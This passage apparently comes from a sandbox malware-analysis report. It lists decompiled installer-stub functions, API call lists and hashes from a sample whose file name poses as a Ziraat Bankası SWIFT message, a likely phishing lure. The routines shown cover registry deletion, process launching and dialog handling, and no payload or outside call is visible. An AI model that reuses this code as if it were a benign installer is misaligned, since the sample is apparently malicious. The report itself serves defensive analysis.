                                  			}








                                  0x00402a49
                                  0x00402a51
                                  0x00402a79
                                  0x00402a63
                                  0x00402ab3
                                  0x00402ab9
                                  0x00000000
                                  0x00402abb
                                  0x00402a77
                                  0x00000000
                                  0x00000000
                                  0x00402a77
                                  0x00402a8e
                                  0x00402a96
                                  0x00402a9d
                                  0x00402ac9
                                  0x00000000
                                  0x00000000
                                  0x00402ad1
                                  0x00402ad9
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00402ad9
                                  0x00000000
                                  0x00402aac
                                  0x00402ac0

                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A49
                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A85
                                  • RegCloseKey.ADVAPI32(?), ref: 00402A8E
                                  • RegCloseKey.ADVAPI32(?), ref: 00402AB3
                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AD1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: Close$DeleteEnumOpen
                                  • String ID:
                                  • API String ID: 1912718029-0
                                  • Opcode ID: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
                                  • Instruction ID: 7ac3799e0b9b7f286de12d9a89f233b53136cfd59643404f79253a10a0ceffad
                                  • Opcode Fuzzy Hash: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
                                  • Instruction Fuzzy Hash: AA115931A00009FEDF21AF90DE48DAB3B79EB44395B104536BA05A01A0DB749E51AE69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00401CC1(int __edx) {
                                  				void* _t17;
                                  				struct HINSTANCE__* _t21;
                                  				struct HWND__* _t25;
                                  				void* _t27;
                                  
                                  				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
                                  				GetClientRect(_t25, _t27 - 0x40);
                                  				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029E8(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
                                  				if(_t17 != _t21) {
                                  					DeleteObject(_t17);
                                  				}
                                  				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t27 - 4));
                                  				return 0;
                                  			}







                                  0x00401ccb
                                  0x00401cd2
                                  0x00401d01
                                  0x00401d09
                                  0x00401d10
                                  0x00401d10
                                  0x00402880
                                  0x0040288c

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                  • String ID:
                                  • API String ID: 1849352358-0
                                  • Opcode ID: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
                                  • Instruction ID: ad5020e38ef11d08f371025551c7f23f007b957d45941c5b52acf933ea75ddf9
                                  • Opcode Fuzzy Hash: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
                                  • Instruction Fuzzy Hash: 31F0F9B2A04105BFD700EBA4EE89DAFB7BDEB44341B104476F601F21A0C7789D018B29
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 51%
                                  			E00404610(int _a4, intOrPtr _a8, unsigned int _a12) {
                                  				char _v36;
                                  				char _v68;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* _t26;
                                  				void* _t34;
                                  				signed int _t36;
                                  				signed int _t39;
                                  				unsigned int _t46;
                                  
                                  				_t46 = _a12;
                                  				_push(0x14);
                                  				_pop(0);
                                  				_t34 = 0xffffffdc;
                                  				if(_t46 < 0x100000) {
                                  					_push(0xa);
                                  					_pop(0);
                                  					_t34 = 0xffffffdd;
                                  				}
                                  				if(_t46 < 0x400) {
                                  					_t34 = 0xffffffde;
                                  				}
                                  				if(_t46 < 0xffff3333) {
                                  					_t39 = 0x14;
                                  					asm("cdq");
                                  					_t46 = _t46 + 1 / _t39;
                                  				}
                                  				_push(E00405AA7(_t34, 0, _t46,  &_v36, 0xffffffdf));
                                  				_push(E00405AA7(_t34, 0, _t46,  &_v68, _t34));
                                  				_t21 = _t46 & 0x00ffffff;
                                  				_t36 = 0xa;
                                  				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
                                  				_push(_t46 >> 0);
                                  				_t26 = E00405AA7(_t34, 0, 0x420498, 0x420498, _a8);
                                  				wsprintfA(_t26 + lstrlenA(0x420498), "%u.%u%s%s");
                                  				return SetDlgItemTextA( *0x423678, _a4, 0x420498);
                                  			}













                                  0x00404618
                                  0x0040461c
                                  0x00404624
                                  0x00404627
                                  0x00404628
                                  0x0040462a
                                  0x0040462c
                                  0x0040462f
                                  0x0040462f
                                  0x00404636
                                  0x0040463c
                                  0x0040463c
                                  0x00404643
                                  0x0040464e
                                  0x0040464f
                                  0x00404652
                                  0x00404652
                                  0x0040465f
                                  0x0040466a
                                  0x0040466d
                                  0x0040467f
                                  0x00404686
                                  0x00404687
                                  0x00404696
                                  0x004046a6
                                  0x004046c2

                                  APIs
                                  • lstrlenA.KERNEL32(00420498,00420498,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404530,000000DF,0000040F,00000400,00000000), ref: 0040469E
                                  • wsprintfA.USER32 ref: 004046A6
                                  • SetDlgItemTextA.USER32(?,00420498), ref: 004046B9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: ItemTextlstrlenwsprintf
                                  • String ID: %u.%u%s%s
                                  • API String ID: 3540041739-3551169577
                                  • Opcode ID: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
                                  • Instruction ID: 4c66ffa9968b47036da968d2f23bae361eeba693da1d293f62fa9500f86314f5
                                  • Opcode Fuzzy Hash: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
                                  • Instruction Fuzzy Hash: 6211E6737001243BDB10A5699C45EAF3299DBC2335F14423BF625F61D1E9798C1186A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 51%
                                  			E00401BAD() {
                                  				signed int _t28;
                                  				CHAR* _t31;
                                  				long _t32;
                                  				int _t37;
                                  				signed int _t38;
                                  				int _t42;
                                  				int _t48;
                                  				struct HWND__* _t52;
                                  				void* _t55;
                                  
                                  				 *(_t55 - 0x34) = E004029CB(3);
                                  				 *(_t55 + 8) = E004029CB(4);
                                  				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
                                  					 *((intOrPtr*)(__ebp - 0x34)) = E004029E8(0x33);
                                  				}
                                  				__eflags =  *(_t55 - 0x10) & 0x00000002;
                                  				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
                                  					 *(_t55 + 8) = E004029E8(0x44);
                                  				}
                                  				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
                                  				_push(1);
                                  				if(__eflags != 0) {
                                  					_t50 = E004029E8();
                                  					_t28 = E004029E8();
                                  					asm("sbb ecx, ecx");
                                  					asm("sbb eax, eax");
                                  					_t31 =  ~( *_t27) & _t50;
                                  					__eflags = _t31;
                                  					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
                                  					goto L10;
                                  				} else {
                                  					_t52 = E004029CB();
                                  					_t37 = E004029CB();
                                  					_t48 =  *(_t55 - 0x10) >> 2;
                                  					if(__eflags == 0) {
                                  						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
                                  						L10:
                                  						 *(_t55 - 8) = _t32;
                                  					} else {
                                  						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
                                  						asm("sbb eax, eax");
                                  						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
                                  					}
                                  				}
                                  				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
                                  				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
                                  					_push( *(_t55 - 8));
                                  					E004059E3();
                                  				}
                                  				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t55 - 4));
                                  				return 0;
                                  			}












                                  0x00401bb6
                                  0x00401bc2
                                  0x00401bc5
                                  0x00401bce
                                  0x00401bce
                                  0x00401bd1
                                  0x00401bd5
                                  0x00401bde
                                  0x00401bde
                                  0x00401be1
                                  0x00401be5
                                  0x00401be7
                                  0x00401c34
                                  0x00401c36
                                  0x00401c3f
                                  0x00401c47
                                  0x00401c4a
                                  0x00401c4a
                                  0x00401c53
                                  0x00000000
                                  0x00401be9
                                  0x00401bf0
                                  0x00401bf2
                                  0x00401bfa
                                  0x00401bfd
                                  0x00401c25
                                  0x00401c59
                                  0x00401c59
                                  0x00401bff
                                  0x00401c0d
                                  0x00401c15
                                  0x00401c18
                                  0x00401c18
                                  0x00401bfd
                                  0x00401c5c
                                  0x00401c5f
                                  0x00401c65
                                  0x00402825
                                  0x00402825
                                  0x00402880
                                  0x0040288c

                                  APIs
                                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                                  • SendMessageA.USER32 ref: 00401C25
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: MessageSend$Timeout
                                  • String ID: !
                                  • API String ID: 1777923405-2657877971
                                  • Opcode ID: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
                                  • Instruction ID: c520659e647c29be31daea63823ecf32d675036654070bdfdaec67237a792274
                                  • Opcode Fuzzy Hash: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
                                  • Instruction Fuzzy Hash: 902183B1A44104BEDF01AFB5CE5BAAD7A75EF45704F14047AF501B61D1D6B88940D728
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004052E5(CHAR* _a4) {
                                  				struct _PROCESS_INFORMATION _v20;
                                  				int _t7;
                                  
                                  				0x4224a0->cb = 0x44;
                                  				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4224a0,  &_v20);
                                  				if(_t7 != 0) {
                                  					CloseHandle(_v20.hThread);
                                  					return _v20.hProcess;
                                  				}
                                  				return _t7;
                                  			}





                                  0x004052ee
                                  0x0040530a
                                  0x00405312
                                  0x00405317
                                  0x00000000
                                  0x0040531d
                                  0x00405321

                                  APIs
                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004224A0,Error launching installer), ref: 0040530A
                                  • CloseHandle.KERNEL32(?), ref: 00405317
                                  Strings
                                  • Error launching installer, xrefs: 004052F8
                                  • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004052E5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: CloseCreateHandleProcess
                                  • String ID: C:\Users\user~1\AppData\Local\Temp\$Error launching installer
                                  • API String ID: 3712363035-2110930418
                                  • Opcode ID: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
                                  • Instruction ID: 638c90c2c8bd3d8652662e5a24b63cb160f6dc818783434175b306b50d96cec4
                                  • Opcode Fuzzy Hash: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
                                  • Instruction Fuzzy Hash: 32E0ECB4A00209BFDB00AF64ED09B6F7BBCFB04348F808522A911E2150D7B4E8148A69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00405578(CHAR* _a4) {
                                  				CHAR* _t7;
                                  
                                  				_t7 = _a4;
                                  				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                  					lstrcatA(_t7, 0x40900c);
                                  				}
                                  				return _t7;
                                  			}




                                  0x00405579
                                  0x00405590
                                  0x00405598
                                  0x00405598
                                  0x004055a0

                                  APIs
                                  • lstrlenA.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,0040320F,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,0040336F), ref: 0040557E
                                  • CharPrevA.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,0040320F,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,0040336F), ref: 00405587
                                  • lstrcatA.KERNEL32(?,0040900C), ref: 00405598
                                  Strings
                                  • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405578
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: CharPrevlstrcatlstrlen
                                  • String ID: C:\Users\user~1\AppData\Local\Temp\
                                  • API String ID: 2659869361-2382934351
                                  • Opcode ID: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                                  • Instruction ID: 4689f4cb8dc724d8b29f049f697397264ef60a28c46f00026a2de7c751f5ddbe
                                  • Opcode Fuzzy Hash: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                                  • Instruction Fuzzy Hash: 17D0A962609A307EE20222159C05ECB2A08CF42301B048022F500B62D2C33C4D418FFE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E00401EC5(char __ebx, char* __edi, char* __esi) {
                                  				char* _t18;
                                  				int _t19;
                                  				void* _t30;
                                  
                                  				_t18 = E004029E8(0xffffffee);
                                  				 *(_t30 - 0x2c) = _t18;
                                  				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
                                  				 *__esi = __ebx;
                                  				 *(_t30 - 8) = _t19;
                                  				 *__edi = __ebx;
                                  				 *((intOrPtr*)(_t30 - 4)) = 1;
                                  				if(_t19 != __ebx) {
                                  					__eax = GlobalAlloc(0x40, __eax);
                                  					 *(__ebp + 8) = __eax;
                                  					if(__eax != __ebx) {
                                  						if(__eax != 0) {
                                  							__ebp - 0x44 = __ebp - 0x34;
                                  							if(VerQueryValueA( *(__ebp + 8), 0x40900c, __ebp - 0x34, __ebp - 0x44) != 0) {
                                  								 *(__ebp - 0x34) = E004059E3(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
                                  								 *(__ebp - 0x34) = E004059E3(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
                                  								 *((intOrPtr*)(__ebp - 4)) = __ebx;
                                  							}
                                  						}
                                  						_push( *(__ebp + 8));
                                  						GlobalFree();
                                  					}
                                  				}
                                  				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
                                  				return 0;
                                  			}






                                  0x00401ec7
                                  0x00401ecf
                                  0x00401ed4
                                  0x00401ed9
                                  0x00401edd
                                  0x00401ee0
                                  0x00401ee2
                                  0x00401ee9
                                  0x00401ef2
                                  0x00401efa
                                  0x00401efd
                                  0x00401f12
                                  0x00401f18
                                  0x00401f2b
                                  0x00401f34
                                  0x00401f40
                                  0x00401f45
                                  0x00401f45
                                  0x00401f2b
                                  0x00401f48
                                  0x00401b75
                                  0x00401b75
                                  0x00401efd
                                  0x00402880
                                  0x0040288c

                                  APIs
                                  • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                                  • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                                  • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                                  • VerQueryValueA.VERSION(?,0040900C,?,?,?,?,?,00000000), ref: 00401F24
                                    • Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                  • String ID:
                                  • API String ID: 1404258612-0
                                  • Opcode ID: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
                                  • Instruction ID: 32b4c4ba67c2d4aeec558e743cb191f9ba8cb92773df28d6a4a6bb64e08d8cf3
                                  • Opcode Fuzzy Hash: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
                                  • Instruction Fuzzy Hash: 43111CB2900108BEDB01EFA5D945DAEBBB9EF04354B20807AF505F61E1D7789E54DB28
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 67%
                                  			E00401D1B() {
                                  				void* __esi;
                                  				int _t6;
                                  				signed char _t11;
                                  				struct HFONT__* _t14;
                                  				void* _t18;
                                  				void* _t24;
                                  				void* _t26;
                                  				void* _t28;
                                  
                                  				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
                                  				0x40af6c->lfHeight =  ~(MulDiv(E004029CB(2), _t6, 0x48));
                                  				 *0x40af7c = E004029CB(3);
                                  				_t11 =  *((intOrPtr*)(_t28 - 0x14));
                                  				 *0x40af83 = 1;
                                  				 *0x40af80 = _t11 & 0x00000001;
                                  				 *0x40af81 = _t11 & 0x00000002;
                                  				 *0x40af82 = _t11 & 0x00000004;
                                  				E00405AA7(_t18, _t24, _t26, 0x40af88,  *((intOrPtr*)(_t28 - 0x20)));
                                  				_t14 = CreateFontIndirectA(0x40af6c);
                                  				_push(_t14);
                                  				_push(_t26);
                                  				E004059E3();
                                  				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t28 - 4));
                                  				return 0;
                                  			}











                                  0x00401d29
                                  0x00401d42
                                  0x00401d4c
                                  0x00401d51
                                  0x00401d5c
                                  0x00401d63
                                  0x00401d75
                                  0x00401d7b
                                  0x00401d80
                                  0x00401d8a
                                  0x004024aa
                                  0x00401561
                                  0x00402825
                                  0x00402880
                                  0x0040288c

                                  APIs
                                  • GetDC.USER32(?), ref: 00401D22
                                  • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                                  • CreateFontIndirectA.GDI32(0040AF6C), ref: 00401D8A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: CapsCreateDeviceFontIndirect
                                  • String ID:
                                  • API String ID: 3272661963-0
                                  • Opcode ID: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
                                  • Instruction ID: 28934dfc7bc65fa7e96b773f26fd89147779a1e7d92ad1971070d574f64f8b8b
                                  • Opcode Fuzzy Hash: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
                                  • Instruction Fuzzy Hash: 3AF0AFF0A48341AEE7009770AE1ABAA3B64A715305F104535F582BA1E2C6BC04159F3F
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00403897(void* __ecx, void* __eflags) {
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed short _t6;
                                  				intOrPtr _t11;
                                  				signed int _t13;
                                  				signed int _t16;
                                  				signed short* _t18;
                                  				signed int _t20;
                                  				signed short* _t23;
                                  				intOrPtr _t25;
                                  				signed int _t26;
                                  				intOrPtr* _t27;
                                  
                                  				_t24 = "1033";
                                  				_t13 = 0xffff;
                                  				_t6 = E004059FC(__ecx, "1033");
                                  				while(1) {
                                  					_t26 =  *0x423ee4;
                                  					if(_t26 == 0) {
                                  						goto L7;
                                  					}
                                  					_t16 =  *( *0x423eb0 + 0x64);
                                  					_t20 =  ~_t16;
                                  					_t18 = _t16 * _t26 +  *0x423ee0;
                                  					while(1) {
                                  						_t18 = _t18 + _t20;
                                  						_t26 = _t26 - 1;
                                  						if((( *_t18 ^ _t6) & _t13) == 0) {
                                  							break;
                                  						}
                                  						if(_t26 != 0) {
                                  							continue;
                                  						}
                                  						goto L7;
                                  					}
                                  					 *0x423680 = _t18[1];
                                  					 *0x423f48 = _t18[3];
                                  					_t23 =  &(_t18[5]);
                                  					if(_t23 != 0) {
                                  						 *0x42367c = _t23;
                                  						E004059E3(_t24,  *_t18 & 0x0000ffff);
                                  						SetWindowTextA( *0x420470, E00405AA7(_t13, _t24, _t26, 0x4236a0, 0xfffffffe));
                                  						_t11 =  *0x423ecc;
                                  						_t27 =  *0x423ec8;
                                  						if(_t11 == 0) {
                                  							L15:
                                  							return _t11;
                                  						}
                                  						_t25 = _t11;
                                  						do {
                                  							_t11 =  *_t27;
                                  							if(_t11 != 0) {
                                  								_t11 = E00405AA7(_t13, _t25, _t27, _t27 + 0x18, _t11);
                                  							}
                                  							_t27 = _t27 + 0x418;
                                  							_t25 = _t25 - 1;
                                  						} while (_t25 != 0);
                                  						goto L15;
                                  					}
                                  					L7:
                                  					if(_t13 != 0xffff) {
                                  						_t13 = 0;
                                  					} else {
                                  						_t13 = 0x3ff;
                                  					}
                                  				}
                                  			}
















                                  0x0040389b
                                  0x004038a0
                                  0x004038a6
                                  0x004038ab
                                  0x004038ab
                                  0x004038b3
                                  0x00000000
                                  0x00000000
                                  0x004038bb
                                  0x004038c3
                                  0x004038c5
                                  0x004038cb
                                  0x004038cb
                                  0x004038cd
                                  0x004038d9
                                  0x00000000
                                  0x00000000
                                  0x004038dd
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004038df
                                  0x004038e4
                                  0x004038ed
                                  0x004038f3
                                  0x004038f8
                                  0x0040390c
                                  0x00403917
                                  0x0040392f
                                  0x00403935
                                  0x0040393a
                                  0x00403942
                                  0x00403963
                                  0x00403963
                                  0x00403963
                                  0x00403944
                                  0x00403946
                                  0x00403946
                                  0x0040394a
                                  0x00403951
                                  0x00403951
                                  0x00403956
                                  0x0040395c
                                  0x0040395c
                                  0x00000000
                                  0x00403946
                                  0x004038fa
                                  0x004038ff
                                  0x00403908
                                  0x00403901
                                  0x00403901
                                  0x00403901
                                  0x004038ff

                                  APIs
                                  • SetWindowTextA.USER32(00000000,004236A0), ref: 0040392F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: TextWindow
                                  • String ID: 1033$C:\Users\user~1\AppData\Local\Temp\
                                  • API String ID: 530164218-3049706366
                                  • Opcode ID: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
                                  • Instruction ID: 77a07bfd4d582853364bfe0cce575c4745298431d34a1254bec181f891eb0756
                                  • Opcode Fuzzy Hash: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
                                  • Instruction Fuzzy Hash: 3611C271B005119BC334AF15D880A373BBDEF84726369827BE901A73A1C77E9E039A58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00404D73(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                  				long _t22;
                                  
                                  				if(_a8 != 0x102) {
